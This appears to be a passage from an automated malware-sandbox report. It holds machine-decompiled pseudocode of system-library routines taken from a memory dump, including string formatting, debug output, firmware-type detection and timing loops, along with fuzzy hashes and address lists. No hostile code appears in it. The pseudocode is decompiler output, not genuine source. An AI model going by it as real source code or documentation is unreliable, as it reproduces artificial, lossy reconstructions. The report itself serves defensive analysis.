                                                                                      									if(_t159 == 0) {
                                                                                      										L27:
                                                                                      										if(_t122 != 0) {
                                                                                      											goto L33;
                                                                                      										}
                                                                                      										L28:
                                                                                      										_v68 = 1;
                                                                                      										goto L35;
                                                                                      									}
                                                                                      									if(_t122 == 0) {
                                                                                      										goto L28;
                                                                                      									}
                                                                                      									_t122 = _t122 ^ _t147;
                                                                                      									goto L27;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					_v72 = _v72 & 0x00000000;
                                                                                      					goto L11;
                                                                                      				}
                                                                                      			}





































                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: `$`
                                                                                      • API String ID: 0-197956300
                                                                                      • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                      • Instruction ID: 47b2db64c2f73b605350b348892826e6ec8acfd2b031a3aa5d046dd24c9c6505
                                                                                      • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                      • Instruction Fuzzy Hash: 1991A1312043469FE724CE29C845B1BBBE6BF84754F18896DF6A5CB290E774EA04CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 77%
                                                                                      			E018351BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                      				signed short* _t63;
                                                                                      				signed int _t64;
                                                                                      				signed int _t65;
                                                                                      				signed int _t67;
                                                                                      				intOrPtr _t74;
                                                                                      				intOrPtr _t84;
                                                                                      				intOrPtr _t88;
                                                                                      				intOrPtr _t94;
                                                                                      				void* _t100;
                                                                                      				void* _t103;
                                                                                      				intOrPtr _t105;
                                                                                      				signed int _t106;
                                                                                      				short* _t108;
                                                                                      				signed int _t110;
                                                                                      				signed int _t113;
                                                                                      				signed int* _t115;
                                                                                      				signed short* _t117;
                                                                                      				void* _t118;
                                                                                      				void* _t119;
                                                                                      
                                                                                      				_push(0x80);
                                                                                      				_push(0x18905f0);
                                                                                      				E0180D0E8(__ebx, __edi, __esi);
                                                                                      				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                                                      				_t115 =  *(_t118 + 0xc);
                                                                                      				 *(_t118 - 0x7c) = _t115;
                                                                                      				 *((char*)(_t118 - 0x65)) = 0;
                                                                                      				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                                      				_t113 = 0;
                                                                                      				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                                                      				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                                                      				_t100 = __ecx;
                                                                                      				if(_t100 == 0) {
                                                                                      					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                                      					E017CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                      					 *((char*)(_t118 - 0x65)) = 1;
                                                                                      					_t63 =  *(_t118 - 0x90);
                                                                                      					_t101 = _t63[2];
                                                                                      					_t64 =  *_t63 & 0x0000ffff;
                                                                                      					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                                      					L20:
                                                                                      					_t65 = _t64 >> 1;
                                                                                      					L21:
                                                                                      					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                                                      					if(_t108 == 0) {
                                                                                      						L27:
                                                                                      						 *_t115 = _t65 + 1;
                                                                                      						_t67 = 0xc0000023;
                                                                                      						L28:
                                                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                                                      						L29:
                                                                                      						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                                                      						E018353CA(0);
                                                                                      						return E0180D130(0, _t113, _t115);
                                                                                      					}
                                                                                      					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                                                      						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                                                      							 *_t108 = 0;
                                                                                      						}
                                                                                      						goto L27;
                                                                                      					}
                                                                                      					 *_t115 = _t65;
                                                                                      					_t115 = _t65 + _t65;
                                                                                      					E017FF3E0(_t108, _t101, _t115);
                                                                                      					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                                                      					_t67 = 0;
                                                                                      					goto L28;
                                                                                      				}
                                                                                      				_t103 = _t100 - 1;
                                                                                      				if(_t103 == 0) {
                                                                                      					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                                                      					_t74 = E017D3690(1, _t117, 0x1791810, _t118 - 0x74);
                                                                                      					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                                                      					_t101 = _t117[2];
                                                                                      					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                                      					if(_t74 < 0) {
                                                                                      						_t64 =  *_t117 & 0x0000ffff;
                                                                                      						_t115 =  *(_t118 - 0x7c);
                                                                                      						goto L20;
                                                                                      					}
                                                                                      					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                                                      					_t115 =  *(_t118 - 0x7c);
                                                                                      					goto L21;
                                                                                      				}
                                                                                      				if(_t103 == 1) {
                                                                                      					_t105 = 4;
                                                                                      					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                                                      					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                                                      					_push(_t118 - 0x70);
                                                                                      					_push(0);
                                                                                      					_push(0);
                                                                                      					_push(_t105);
                                                                                      					_push(_t118 - 0x78);
                                                                                      					_push(0x6b);
                                                                                      					 *((intOrPtr*)(_t118 - 0x64)) = E017FAA90();
                                                                                      					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                                      					_t113 = L017D4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                                                      					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                                                      					if(_t113 != 0) {
                                                                                      						_push(_t118 - 0x70);
                                                                                      						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                                                      						_push(_t113);
                                                                                      						_push(4);
                                                                                      						_push(_t118 - 0x78);
                                                                                      						_push(0x6b);
                                                                                      						_t84 = E017FAA90();
                                                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                                                      						if(_t84 < 0) {
                                                                                      							goto L29;
                                                                                      						}
                                                                                      						_t110 = 0;
                                                                                      						_t106 = 0;
                                                                                      						while(1) {
                                                                                      							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                                                      							 *(_t118 - 0x88) = _t106;
                                                                                      							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                                                      								break;
                                                                                      							}
                                                                                      							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                                                      							_t106 = _t106 + 1;
                                                                                      						}
                                                                                      						_t88 = E0183500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                                                      						_t119 = _t119 + 0x1c;
                                                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                                                      						if(_t88 < 0) {
                                                                                      							goto L29;
                                                                                      						}
                                                                                      						_t101 = _t118 - 0x3c;
                                                                                      						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                                                      						goto L21;
                                                                                      					}
                                                                                      					_t67 = 0xc0000017;
                                                                                      					goto L28;
                                                                                      				}
                                                                                      				_push(0);
                                                                                      				_push(0x20);
                                                                                      				_push(_t118 - 0x60);
                                                                                      				_push(0x5a);
                                                                                      				_t94 = E017F9860();
                                                                                      				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                                                      				if(_t94 < 0) {
                                                                                      					goto L29;
                                                                                      				}
                                                                                      				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                                                      					_t101 = L"Legacy";
                                                                                      					_push(6);
                                                                                      				} else {
                                                                                      					_t101 = L"UEFI";
                                                                                      					_push(4);
                                                                                      				}
                                                                                      				_pop(_t65);
                                                                                      				goto L21;
                                                                                      			}























                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: Legacy$UEFI
                                                                                      • API String ID: 2994545307-634100481
                                                                                      • Opcode ID: acaa6e31e61caed4e801760308e2057d6d634b41a3c7b8ce5b2cc8df34cc8fde
                                                                                      • Instruction ID: b49aaca841455568e83b02c1c9beca83e7e1a2a5cc33946e9b54f4a85add4572
                                                                                      • Opcode Fuzzy Hash: acaa6e31e61caed4e801760308e2057d6d634b41a3c7b8ce5b2cc8df34cc8fde
                                                                                      • Instruction Fuzzy Hash: 9C516071E006099FDB15DFA8C890BAEBBF8FF89704F18402DE649EB251D671DA00CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 78%
                                                                                      			E017BB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                                                      				signed int _t65;
                                                                                      				signed short _t69;
                                                                                      				intOrPtr _t70;
                                                                                      				signed short _t85;
                                                                                      				void* _t86;
                                                                                      				signed short _t89;
                                                                                      				signed short _t91;
                                                                                      				intOrPtr _t92;
                                                                                      				intOrPtr _t97;
                                                                                      				intOrPtr* _t98;
                                                                                      				signed short _t99;
                                                                                      				signed short _t101;
                                                                                      				void* _t102;
                                                                                      				char* _t103;
                                                                                      				signed short _t104;
                                                                                      				intOrPtr* _t110;
                                                                                      				void* _t111;
                                                                                      				void* _t114;
                                                                                      				intOrPtr* _t115;
                                                                                      
                                                                                      				_t109 = __esi;
                                                                                      				_t108 = __edi;
                                                                                      				_t106 = __edx;
                                                                                      				_t95 = __ebx;
                                                                                      				_push(0x90);
                                                                                      				_push(0x188f7a8);
                                                                                      				E0180D0E8(__ebx, __edi, __esi);
                                                                                      				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                                                      				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                                                      				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                                                      				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                                                      				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                                                      				if(__edx == 0xffffffff) {
                                                                                      					L6:
                                                                                      					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                                                      					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                                                      					__eflags = _t65 & 0x00000002;
                                                                                      					if((_t65 & 0x00000002) != 0) {
                                                                                      						L3:
                                                                                      						L4:
                                                                                      						return E0180D130(_t95, _t108, _t109);
                                                                                      					}
                                                                                      					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                                                      					_t108 = 0;
                                                                                      					_t109 = 0;
                                                                                      					_t95 = 0;
                                                                                      					__eflags = 0;
                                                                                      					while(1) {
                                                                                      						__eflags = _t95 - 0x200;
                                                                                      						if(_t95 >= 0x200) {
                                                                                      							break;
                                                                                      						}
                                                                                      						E017FD000(0x80);
                                                                                      						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                                                      						_t108 = _t115;
                                                                                      						_t95 = _t95 - 0xffffff80;
                                                                                      						_t17 = _t114 - 4;
                                                                                      						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                                                      						__eflags =  *_t17;
                                                                                      						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                      						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                      						_t102 = _t110 + 1;
                                                                                      						do {
                                                                                      							_t85 =  *_t110;
                                                                                      							_t110 = _t110 + 1;
                                                                                      							__eflags = _t85;
                                                                                      						} while (_t85 != 0);
                                                                                      						_t111 = _t110 - _t102;
                                                                                      						_t21 = _t95 - 1; // -129
                                                                                      						_t86 = _t21;
                                                                                      						__eflags = _t111 - _t86;
                                                                                      						if(_t111 > _t86) {
                                                                                      							_t111 = _t86;
                                                                                      						}
                                                                                      						E017FF3E0(_t108, _t106, _t111);
                                                                                      						_t115 = _t115 + 0xc;
                                                                                      						_t103 = _t111 + _t108;
                                                                                      						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                                                      						_t89 = _t95 - _t111;
                                                                                      						__eflags = _t89;
                                                                                      						_push(0);
                                                                                      						if(_t89 == 0) {
                                                                                      							L15:
                                                                                      							_t109 = 0xc000000d;
                                                                                      							goto L16;
                                                                                      						} else {
                                                                                      							__eflags = _t89 - 0x7fffffff;
                                                                                      							if(_t89 <= 0x7fffffff) {
                                                                                      								L16:
                                                                                      								 *(_t114 - 0x94) = _t109;
                                                                                      								__eflags = _t109;
                                                                                      								if(_t109 < 0) {
                                                                                      									__eflags = _t89;
                                                                                      									if(_t89 != 0) {
                                                                                      										 *_t103 = 0;
                                                                                      									}
                                                                                      									L26:
                                                                                      									 *(_t114 - 0xa0) = _t109;
                                                                                      									 *(_t114 - 4) = 0xfffffffe;
                                                                                      									__eflags = _t109;
                                                                                      									if(_t109 >= 0) {
                                                                                      										L31:
                                                                                      										_t98 = _t108;
                                                                                      										_t39 = _t98 + 1; // 0x1
                                                                                      										_t106 = _t39;
                                                                                      										do {
                                                                                      											_t69 =  *_t98;
                                                                                      											_t98 = _t98 + 1;
                                                                                      											__eflags = _t69;
                                                                                      										} while (_t69 != 0);
                                                                                      										_t99 = _t98 - _t106;
                                                                                      										__eflags = _t99;
                                                                                      										L34:
                                                                                      										_t70 =  *[fs:0x30];
                                                                                      										__eflags =  *((char*)(_t70 + 2));
                                                                                      										if( *((char*)(_t70 + 2)) != 0) {
                                                                                      											L40:
                                                                                      											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                                                      											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                                                      											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                                                      											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                                                      											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                                                      											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                                                      											 *(_t114 - 4) = 1;
                                                                                      											_push(_t114 - 0x74);
                                                                                      											L0180DEF0(_t99, _t106);
                                                                                      											 *(_t114 - 4) = 0xfffffffe;
                                                                                      											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                      											goto L3;
                                                                                      										}
                                                                                      										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                                                      										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                                                      											goto L40;
                                                                                      										}
                                                                                      										_push( *((intOrPtr*)(_t114 + 8)));
                                                                                      										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                                                      										_push(_t99 & 0x0000ffff);
                                                                                      										_push(_t108);
                                                                                      										_push(1);
                                                                                      										_t101 = E017FB280();
                                                                                      										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                                                      										if( *((char*)(_t114 + 0x14)) == 1) {
                                                                                      											__eflags = _t101 - 0x80000003;
                                                                                      											if(_t101 == 0x80000003) {
                                                                                      												E017FB7E0(1);
                                                                                      												_t101 = 0;
                                                                                      												__eflags = 0;
                                                                                      											}
                                                                                      										}
                                                                                      										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                      										goto L4;
                                                                                      									}
                                                                                      									__eflags = _t109 - 0x80000005;
                                                                                      									if(_t109 == 0x80000005) {
                                                                                      										continue;
                                                                                      									}
                                                                                      									break;
                                                                                      								}
                                                                                      								 *(_t114 - 0x90) = 0;
                                                                                      								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                                                      								_t91 = E017FE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                                                      								_t115 = _t115 + 0x10;
                                                                                      								_t104 = _t91;
                                                                                      								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                                                      								__eflags = _t104;
                                                                                      								if(_t104 < 0) {
                                                                                      									L21:
                                                                                      									_t109 = 0x80000005;
                                                                                      									 *(_t114 - 0x90) = 0x80000005;
                                                                                      									L22:
                                                                                      									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                                                      									L23:
                                                                                      									 *(_t114 - 0x94) = _t109;
                                                                                      									goto L26;
                                                                                      								}
                                                                                      								__eflags = _t104 - _t92;
                                                                                      								if(__eflags > 0) {
                                                                                      									goto L21;
                                                                                      								}
                                                                                      								if(__eflags == 0) {
                                                                                      									goto L22;
                                                                                      								}
                                                                                      								goto L23;
                                                                                      							}
                                                                                      							goto L15;
                                                                                      						}
                                                                                      					}
                                                                                      					__eflags = _t109;
                                                                                      					if(_t109 >= 0) {
                                                                                      						goto L31;
                                                                                      					}
                                                                                      					__eflags = _t109 - 0x80000005;
                                                                                      					if(_t109 != 0x80000005) {
                                                                                      						goto L31;
                                                                                      					}
                                                                                      					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                                                      					_t38 = _t95 - 1; // -129
                                                                                      					_t99 = _t38;
                                                                                      					goto L34;
                                                                                      				}
                                                                                      				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                      					__eflags = __edx - 0x65;
                                                                                      					if(__edx != 0x65) {
                                                                                      						goto L2;
                                                                                      					}
                                                                                      					goto L6;
                                                                                      				}
                                                                                      				L2:
                                                                                      				_push( *((intOrPtr*)(_t114 + 8)));
                                                                                      				_push(_t106);
                                                                                      				if(E017FA890() != 0) {
                                                                                      					goto L6;
                                                                                      				}
                                                                                      				goto L3;
                                                                                      			}






















                                                                                      0x01814884
                                                                                      0x00000000
                                                                                      0x0181487d
                                                                                      0x0181487d
                                                                                      0x01814882
                                                                                      0x01814889
                                                                                      0x01814889
                                                                                      0x0181488f
                                                                                      0x01814891
                                                                                      0x018148e0
                                                                                      0x018148e2
                                                                                      0x018148e4
                                                                                      0x018148e4
                                                                                      0x018148e7
                                                                                      0x018148e7
                                                                                      0x018148ed
                                                                                      0x018148f4
                                                                                      0x018148f6
                                                                                      0x01814951
                                                                                      0x01814951
                                                                                      0x01814953
                                                                                      0x01814953
                                                                                      0x01814956
                                                                                      0x01814956
                                                                                      0x01814958
                                                                                      0x01814959
                                                                                      0x01814959
                                                                                      0x0181495d
                                                                                      0x0181495d
                                                                                      0x0181495f
                                                                                      0x0181495f
                                                                                      0x01814965
                                                                                      0x01814969
                                                                                      0x018149ba
                                                                                      0x018149ba
                                                                                      0x018149c1
                                                                                      0x018149c5
                                                                                      0x018149cc
                                                                                      0x018149d4
                                                                                      0x018149d7
                                                                                      0x018149da
                                                                                      0x018149e4
                                                                                      0x018149e5
                                                                                      0x018149f3
                                                                                      0x01814a02
                                                                                      0x00000000
                                                                                      0x01814a02
                                                                                      0x01814972
                                                                                      0x01814974
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x01814976
                                                                                      0x01814979
                                                                                      0x01814982
                                                                                      0x01814983
                                                                                      0x01814984
                                                                                      0x0181498b
                                                                                      0x0181498d
                                                                                      0x01814991
                                                                                      0x01814993
                                                                                      0x01814999
                                                                                      0x0181499d
                                                                                      0x018149a2
                                                                                      0x018149a2
                                                                                      0x018149a2
                                                                                      0x01814999
                                                                                      0x018149ac
                                                                                      0x00000000
                                                                                      0x018149b3
                                                                                      0x018148f8
                                                                                      0x018148fe
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x018148fe
                                                                                      0x01814895
                                                                                      0x0181489c
                                                                                      0x018148ad
                                                                                      0x018148b2
                                                                                      0x018148b5
                                                                                      0x018148b7
                                                                                      0x018148ba
                                                                                      0x018148bc
                                                                                      0x018148c6
                                                                                      0x018148c6
                                                                                      0x018148cb
                                                                                      0x018148d1
                                                                                      0x018148d4
                                                                                      0x018148d8
                                                                                      0x018148d8
                                                                                      0x00000000
                                                                                      0x018148d8
                                                                                      0x018148be
                                                                                      0x018148c0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x018148c2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x018148c4
                                                                                      0x00000000
                                                                                      0x01814882
                                                                                      0x0181487b
                                                                                      0x01814904
                                                                                      0x01814906
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x01814908
                                                                                      0x0181490e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x01814910
                                                                                      0x01814917
                                                                                      0x01814917
                                                                                      0x00000000
                                                                                      0x01814917
                                                                                      0x017bb1ba
                                                                                      0x018147f9
                                                                                      0x018147fc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x018147fc
                                                                                      0x017bb1c0
                                                                                      0x017bb1c0
                                                                                      0x017bb1c3
                                                                                      0x017bb1cb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: _vswprintf_s
                                                                                      • String ID:
                                                                                      • API String ID: 677850445-0
                                                                                      • Opcode ID: c966c1d14a744dc524dd89eaac2bf87f34e31d6d06f6d639c0d2d3cac09d4f70
                                                                                      • Instruction ID: 8ea44427aa7a2a9277c5bb6b1524a5582281d7a514bae0698f624133863f614a
                                                                                      • Opcode Fuzzy Hash: c966c1d14a744dc524dd89eaac2bf87f34e31d6d06f6d639c0d2d3cac09d4f70
                                                                                      • Instruction Fuzzy Hash: 1951E172D0025A8EEB31CF68C844BAEBBB5BF04714F1041ADDD59EB29AD7704A45CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 76%
                                                                                      			E017DB944(signed int* __ecx, char __edx) {
                                                                                      				signed int _v8;
                                                                                      				signed int _v16;
                                                                                      				signed int _v20;
                                                                                      				char _v28;
                                                                                      				signed int _v32;
                                                                                      				char _v36;
                                                                                      				signed int _v40;
                                                                                      				intOrPtr _v44;
                                                                                      				signed int* _v48;
                                                                                      				signed int _v52;
                                                                                      				signed int _v56;
                                                                                      				intOrPtr _v60;
                                                                                      				intOrPtr _v64;
                                                                                      				intOrPtr _v68;
                                                                                      				intOrPtr _v72;
                                                                                      				intOrPtr _v76;
                                                                                      				char _v77;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				intOrPtr* _t65;
                                                                                      				intOrPtr _t67;
                                                                                      				intOrPtr _t68;
                                                                                      				char* _t73;
                                                                                      				intOrPtr _t77;
                                                                                      				intOrPtr _t78;
                                                                                      				signed int _t82;
                                                                                      				intOrPtr _t83;
                                                                                      				void* _t87;
                                                                                      				char _t88;
                                                                                      				intOrPtr* _t89;
                                                                                      				intOrPtr _t91;
                                                                                      				void* _t97;
                                                                                      				intOrPtr _t100;
                                                                                      				void* _t102;
                                                                                      				void* _t107;
                                                                                      				signed int _t108;
                                                                                      				intOrPtr* _t112;
                                                                                      				void* _t113;
                                                                                      				intOrPtr* _t114;
                                                                                      				intOrPtr _t115;
                                                                                      				intOrPtr _t116;
                                                                                      				intOrPtr _t117;
                                                                                      				signed int _t118;
                                                                                      				void* _t130;
                                                                                      
                                                                                      				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                                                      				_v8 =  *0x18ad360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                                                      				_t112 = __ecx;
                                                                                      				_v77 = __edx;
                                                                                      				_v48 = __ecx;
                                                                                      				_v28 = 0;
                                                                                      				_t5 = _t112 + 0xc; // 0x575651ff
                                                                                      				_t105 =  *_t5;
                                                                                      				_v20 = 0;
                                                                                      				_v16 = 0;
                                                                                      				if(_t105 == 0) {
                                                                                      					_t50 = _t112 + 4; // 0x5de58b5b
                                                                                      					_t60 =  *__ecx |  *_t50;
                                                                                      					if(( *__ecx |  *_t50) != 0) {
                                                                                      						 *__ecx = 0;
                                                                                      						__ecx[1] = 0;
                                                                                      						if(E017D7D50() != 0) {
                                                                                      							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                      						} else {
                                                                                      							_t65 = 0x7ffe0386;
                                                                                      						}
                                                                                      						if( *_t65 != 0) {
                                                                                      							E01888CD6(_t112);
                                                                                      						}
                                                                                      						_push(0);
                                                                                      						_t52 = _t112 + 0x10; // 0x778df98b
                                                                                      						_push( *_t52);
                                                                                      						_t60 = E017F9E20();
                                                                                      					}
                                                                                      					L20:
                                                                                      					_pop(_t107);
                                                                                      					_pop(_t113);
                                                                                      					_pop(_t87);
                                                                                      					return E017FB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                                                      				}
                                                                                      				_t8 = _t112 + 8; // 0x8b000cc2
                                                                                      				_t67 =  *_t8;
                                                                                      				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                                                      				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                                                      				_t108 =  *(_t67 + 0x14);
                                                                                      				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                                                      				_t105 = 0x2710;
                                                                                      				asm("sbb eax, edi");
                                                                                      				_v44 = _t88;
                                                                                      				_v52 = _t108;
                                                                                      				_t60 = E017FCE00(_t97, _t68, 0x2710, 0);
                                                                                      				_v56 = _t60;
                                                                                      				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                                                      					L3:
                                                                                      					 *(_t112 + 0x44) = _t60;
                                                                                      					_t105 = _t60 * 0x2710 >> 0x20;
                                                                                      					 *_t112 = _t88;
                                                                                      					 *(_t112 + 4) = _t108;
                                                                                      					_v20 = _t60 * 0x2710;
                                                                                      					_v16 = _t60 * 0x2710 >> 0x20;
                                                                                      					if(_v77 != 0) {
                                                                                      						L16:
                                                                                      						_v36 = _t88;
                                                                                      						_v32 = _t108;
                                                                                      						if(E017D7D50() != 0) {
                                                                                      							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                      						} else {
                                                                                      							_t73 = 0x7ffe0386;
                                                                                      						}
                                                                                      						if( *_t73 != 0) {
                                                                                      							_t105 = _v40;
                                                                                      							E01888F6A(_t112, _v40, _t88, _t108);
                                                                                      						}
                                                                                      						_push( &_v28);
                                                                                      						_push(0);
                                                                                      						_push( &_v36);
                                                                                      						_t48 = _t112 + 0x10; // 0x778df98b
                                                                                      						_push( *_t48);
                                                                                      						_t60 = E017FAF60();
                                                                                      						goto L20;
                                                                                      					} else {
                                                                                      						_t89 = 0x7ffe03b0;
                                                                                      						do {
                                                                                      							_t114 = 0x7ffe0010;
                                                                                      							do {
                                                                                      								_t77 =  *0x18a8628; // 0x0
                                                                                      								_v68 = _t77;
                                                                                      								_t78 =  *0x18a862c; // 0x0
                                                                                      								_v64 = _t78;
                                                                                      								_v72 =  *_t89;
                                                                                      								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                                                      								while(1) {
                                                                                      									_t105 =  *0x7ffe000c;
                                                                                      									_t100 =  *0x7ffe0008;
                                                                                      									if(_t105 ==  *_t114) {
                                                                                      										goto L8;
                                                                                      									}
                                                                                      									asm("pause");
                                                                                      								}
                                                                                      								L8:
                                                                                      								_t89 = 0x7ffe03b0;
                                                                                      								_t115 =  *0x7ffe03b0;
                                                                                      								_t82 =  *0x7FFE03B4;
                                                                                      								_v60 = _t115;
                                                                                      								_t114 = 0x7ffe0010;
                                                                                      								_v56 = _t82;
                                                                                      							} while (_v72 != _t115 || _v76 != _t82);
                                                                                      							_t83 =  *0x18a8628; // 0x0
                                                                                      							_t116 =  *0x18a862c; // 0x0
                                                                                      							_v76 = _t116;
                                                                                      							_t117 = _v68;
                                                                                      						} while (_t117 != _t83 || _v64 != _v76);
                                                                                      						asm("sbb edx, [esp+0x24]");
                                                                                      						_t102 = _t100 - _v60 - _t117;
                                                                                      						_t112 = _v48;
                                                                                      						_t91 = _v44;
                                                                                      						asm("sbb edx, eax");
                                                                                      						_t130 = _t105 - _v52;
                                                                                      						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                                                      							_t88 = _t102 - _t91;
                                                                                      							asm("sbb edx, edi");
                                                                                      							_t108 = _t105;
                                                                                      						} else {
                                                                                      							_t88 = 0;
                                                                                      							_t108 = 0;
                                                                                      						}
                                                                                      						goto L16;
                                                                                      					}
                                                                                      				} else {
                                                                                      					if( *(_t112 + 0x44) == _t60) {
                                                                                      						goto L20;
                                                                                      					}
                                                                                      					goto L3;
                                                                                      				}
                                                                                      			}

















































                                                                                      APIs
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017DB9A5
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                      • String ID:
                                                                                      • API String ID: 885266447-0
